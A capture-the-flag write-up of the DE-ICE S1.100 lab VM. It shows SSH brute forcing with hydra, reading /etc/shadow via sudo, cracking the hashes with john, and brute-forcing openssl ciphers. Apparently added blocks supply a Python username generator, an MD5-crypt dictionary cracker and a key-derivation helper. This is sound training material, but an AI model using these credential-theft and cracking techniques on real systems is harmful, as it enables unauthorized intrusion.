DE-ICE: S1.100

February 04, 2015

This is my write-up for DE-ICE S1.100, a “boot to root” VM from the Hackingdojo website that is also available on Vulnhub. It has been built with vulnerabilities on purpose for you to exploit. The idea is to get root on the VM any way you can, then get the flag.

So first of all I started with an nmap scan of the box to see which ports were open…

root@kali~# nmap 192.168.1.100

Nmap scan report for 192.168.1.100
Host is up (0.0027s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE
20/tcp  closed ftp-data
21/tcp  open   ftp
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp closed https

Port 80 was open, so I opened up a web browser and went to http://192.168.1.100. It displays a welcome page to the challenge and a link to the game related pages at http://192.168.1.100/index2.php.

On the page there was a list of people and their email addresses. I took the names from the website and used a script from superkojiman to generate a username list.

I tried the sysadmins' potential usernames first, as they were likely to have the highest privileges on the box.

adamadams
adamsadam
adam.adams
adams.adam
adamsa
aadams
aadam
a.adams
a.adam
adam
adams
bobbanter
banterbob
bob.banter
banter.bob
banterb
bbanter
bbob
b.banter
b.bob
bob
banter
chadcoffee
coffeechad
chad.coffee
coffee.chad
coffeec
ccoffee
cchad
c.coffee
c.chad
chad
coffee
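As an added example (my own code, not the superkojiman script the post used), here is a small Python generator that produces the same eleven username forms per person shown in the list above; the three names are taken from that list, and the output file name users.txt is an assumption that matches the hydra command later on.

```python
# Username permutation generator for password spraying / user enumeration.
# Constructed input: the three names from the DE-ICE contact page.
NAMES = ["Adam Adams", "Bob Banter", "Chad Coffee"]


def username_candidates(full_name):
    """Return the username forms an organisation commonly derives from a
    first/last name, in the same order as the list in the post."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]          # middle names are ignored
    return [
        first + last,            # adamadams
        last + first,            # adamsadam
        first + "." + last,      # adam.adams
        last + "." + first,      # adams.adam
        last + first[0],         # adamsa
        first[0] + last,         # aadams
        first[0] + first,        # aadam
        first[0] + "." + last,   # a.adams
        first[0] + "." + first,  # a.adam
        first,                   # adam
        last,                    # adams
    ]


def build_wordlist(names):
    """Flatten candidates for every name, de-duplicated, order preserved,
    so the highest-value names (listed first) are tried first by hydra."""
    seen, out = set(), []
    for name in names:
        for user in username_candidates(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Assumed output file name; hydra later reads it with -L users.txt
    with open("users.txt", "w") as fh:
        fh.write("\n".join(build_wordlist(NAMES)) + "\n")
```

Two people sharing a surname, or a first name equal to someone else's surname, would otherwise produce duplicate lines, which is why the list is de-duplicated before it is fed to hydra.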

Next I thought I would have a look at the ftp service, but after probing the ftp port a bit I found that it was broken:

root@kali~# nc -v -n 192.168.1.100 21

(UNKNOWN) [192.168.1.100] 21 (ftp) open
500 OOPS: could not bind listening IPv4 socket

root@kali~# nmap -p21 -sV 192.168.1.100

Nmap scan report for 192.168.1.100
Host is up (0.0032s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd (broken: could not bind listening IPv4 socket)

So next I decided to try the usernames I had generated against the ssh service:

root@kali~# hydra -L users.txt -P /usr/share/wordlists/darkc0de.txt -t 5 -v -V -e ns -o login.txt 192.168.1.100 ssh

This took a while to run, but luckily aadams was a valid user and their password (nostradamus) was in my wordlist. (The -e ns flags also try a blank password and the username as the password, and -t 5 keeps the number of parallel connections down.) I then logged in over ssh as aadams with the password nostradamus and checked what sudo privileges aadams had:

root@kali~# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ id
uid=1000(aadams) gid=10(wheel) groups=10(wheel)
aadams@slax:~$ sudo -l

Password:
User aadams may run the following commands on this host:
       (root) NOEXEC: /bin/ls
       (root) NOEXEC: /usr/bin/cat
       (root) NOEXEC: /usr/bin/more
       (root) NOEXEC: !/usr/bin/su *root*

Being able to run cat as root meant I could read /etc/shadow, which holds the password hashes (/etc/passwd is world-readable, so it needs no sudo). Note the NOEXEC tag on those entries: sudo uses it to stop the command from running further programs, so the usual trick of escaping to a root shell from more with !sh is blocked, and the !/usr/bin/su *root* entry rules out sudo su. Reading the hashes and cracking them offline is the route instead: copy both files to my box, unshadow them and hopefully crack the root password:

aadams@slax:~$ sudo cat /etc/shadow

root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

aadams@slax:~$ cat /etc/passwd

root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
root@kali~# unshadow passwd.txt shadow.txt > unshadowed.txt

After unshadowing the files I used john the ripper to crack the password hashes:

root@kali~# john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

John came back with the passwords for all the users, including root's, which was tarot. So I tried the root password john gave me:
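As an added example, and not code from the post: this merges passwd and shadow the way unshadow does and then runs a dictionary attack against the $1$ (MD5-crypt) hashes in pure Python, implementing MD5-crypt with hashlib because the crypt module is deprecated in Python 3.11 and removed in 3.13. The sample shadow entries below are constructed with the same function (using the salts seen on the box) rather than copied from it, and the three-word wordlist is hypothetical; the real shadow lines from the box can be pasted in unchanged.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Emit `count` base-64 chars of `value`, least-significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt, magic="$1$"):
    """FreeBSD/glibc MD5-crypt ($1$): 1000 rounds of MD5, custom encoding."""
    pw, sb, mb = password.encode(), salt[:8].encode(), magic.encode()
    alt = hashlib.md5(pw + sb + pw).digest()
    ctx = hashlib.md5(pw + mb + sb)
    n = len(pw)
    while n > 0:                      # mix in len(pw) bytes of alt
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                          # one byte per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return magic + salt[:8] + "$" + out


def unshadow(passwd_text, shadow_text):
    """Merge like John's unshadow: swap the 'x' in passwd field 2 for the hash."""
    hashes = {}
    for line in shadow_text.splitlines():
        if ":" in line:
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if ":" not in line:
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def crack(merged, wordlist):
    """Dictionary attack: {user: password} for every $1$ hash that matches."""
    found = {}
    for entry in merged:
        user, h = entry.split(":")[:2]
        if not h.startswith("$1$"):
            continue                  # locked accounts, other hash types
        salt = h.split("$")[2]
        for candidate in wordlist:
            if md5crypt(candidate, salt) == h:
                found[user] = candidate
                break
    return found


# Constructed sample files (hashes generated here, not copied from the box).
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "aadams:x:1000:10:,,,:/home/aadams:/bin/bash\n"
                 "bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash\n")
SAMPLE_SHADOW = ("root:" + md5crypt("tarot", "TOi0HE5n") + ":13553:0:::::\n"
                 "aadams:" + md5crypt("nostradamus", "6cP/ya8m") + ":13550:0:99999:7:::\n"
                 "bbanter:!:13550:0:99999:7:::\n")      # locked account
WORDLIST = ["password", "tarot", "nostradamus"]          # hypothetical wordlist

if __name__ == "__main__":
    for user, pw in crack(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW), WORDLIST).items():
        print(f"{user}:{pw}")
```

At 1000 MD5 rounds per guess this pure-Python check manages only a few thousand candidates per second, which is why the post hands the real job to john; the point here is to see exactly what unshadow produces and what the cracker is computing.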

aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

That's it, I have root, done… or is it?

There was one more challenge after this and that was to read the contents of the /home/ftp/incoming/salary_dec2003.csv.enc file.

Now this took me a while to even get started with. Firstly, running strings on the file showed the string Salted__ at the very start:

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/

Salted__ is the 8-byte magic that openssl enc writes at the start of a file when it encrypts with a salt (the next 8 bytes are the salt itself), so I had a look online at openssl encryption and how to decrypt it. Then I remembered the strange message in the passwd file next to the root entry: DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION.

So I had my command to decrypt, and an idea that the password would be tarot (the root password), but no idea which cipher had been used. So I wrote a script to list every cipher openssl supports and try each one:

#!/bin/bash
# Try every cipher openssl supports, using the root password as the key.
in=salary_dec2003.csv.enc
out=salary_dec2003.csv
key=tarot
# OpenSSL 1.1+ renamed this to "openssl list -cipher-commands".
ciphers=$(openssl list-cipher-commands 2>/dev/null || openssl list -cipher-commands)
for i in $ciphers; do
    # Exit status 0 only means the padding check passed (stream ciphers never
    # fail), so also require that the output is printable text. "-md md5" is
    # the key derivation pre-1.1 OpenSSL used; newer versions default to sha256.
    if openssl enc -d -"$i" -md md5 -in "$in" -k "$key" -out "$out" 2>/dev/null &&
       [ "$(tr -d '[:print:]\n\r\t' < "$out" | wc -c)" -eq 0 ]; then
        echo "decrypted with $i"; exit 0
    fi
done
rm -f "$out"; exit 1
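The two things the brute-force script relies on, the Salted__ file layout and the way openssl enc turns a passphrase into a key and IV, as an added example in Python (my code, not from the post or from OpenSSL). It parses the header, reimplements EVP_BytesToKey (the count=1 derivation used by openssl enc -k), and includes the printable-text heuristic that tells a right cipher from one that merely did not error out. The sample header and salt are constructed, not taken from the box.

```python
import hashlib

OPENSSL_MAGIC = b"Salted__"


def parse_openssl_header(blob):
    """Split an 'openssl enc -salt' file into (salt, ciphertext).
    Bytes 0-7 are the literal 'Salted__', bytes 8-15 the random salt."""
    if len(blob) < 16 or blob[:8] != OPENSSL_MAGIC:
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, md="md5", count=1):
    """OpenSSL EVP_BytesToKey: D_i = H(D_{i-1} || password || salt), repeated
    until key_len + iv_len bytes exist. openssl enc -k uses count=1, and
    pre-1.1 releases used md5 here while 1.1+ defaults to sha256, which is
    why an old file needs '-md md5' on a new box."""
    data, prev = b"", b""
    while len(data) < key_len + iv_len:
        prev = hashlib.new(md, prev + password + salt).digest()
        for _ in range(count - 1):
            prev = hashlib.new(md, prev).digest()
        data += prev
    return data[:key_len], data[key_len:key_len + iv_len]


def looks_like_text(plaintext, threshold=0.95):
    """Heuristic for the cipher brute force: a wrong cipher usually still
    'decrypts' without error but yields bytes that are mostly unprintable."""
    if not plaintext:
        return False
    printable = sum(1 for b in plaintext if 32 <= b < 127 or b in b"\r\n\t")
    return printable / len(plaintext) >= threshold


# Constructed sample: a Salted__ header, a fixed 8-byte salt, dummy body.
SAMPLE_FILE = OPENSSL_MAGIC + b"\x01\x02\x03\x04\x05\x06\x07\x08" + b"\xde\xad\xbe\xef" * 4

if __name__ == "__main__":
    salt, body = parse_openssl_header(SAMPLE_FILE)
    for md in ("md5", "sha256"):
        key, iv = evp_bytes_to_key(b"tarot", salt, 16, 16, md)
        print(f"aes-128-cbc via {md}: key={key.hex()} iv={iv.hex()}")
```

Because the salt is stored in clear in the header, the only secret in the scheme is the passphrase, which is exactly why the passwd comment about the root password was the clue.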

Then once the file was decrypted I could read the contents:

root@kali~# cat salary_dec2003.csv

,Employee information,,,,,,,,,,,,,,
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total Taxes Withheld (Percentage),"Insurance
Deduction
(Dollars)","Other Regular
Deduction
(Dollars)","Total Regular Deductions (Excluding taxes, in dollars)","Direct Deposit Info
Routing Number","Direct Deposit Info
Account Number"
,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264

That's it, challenge complete! This was pretty hard for me as a beginner, but the idea is to get better over time, and I hope that writing these up will help me learn more about why and how to do certain things.
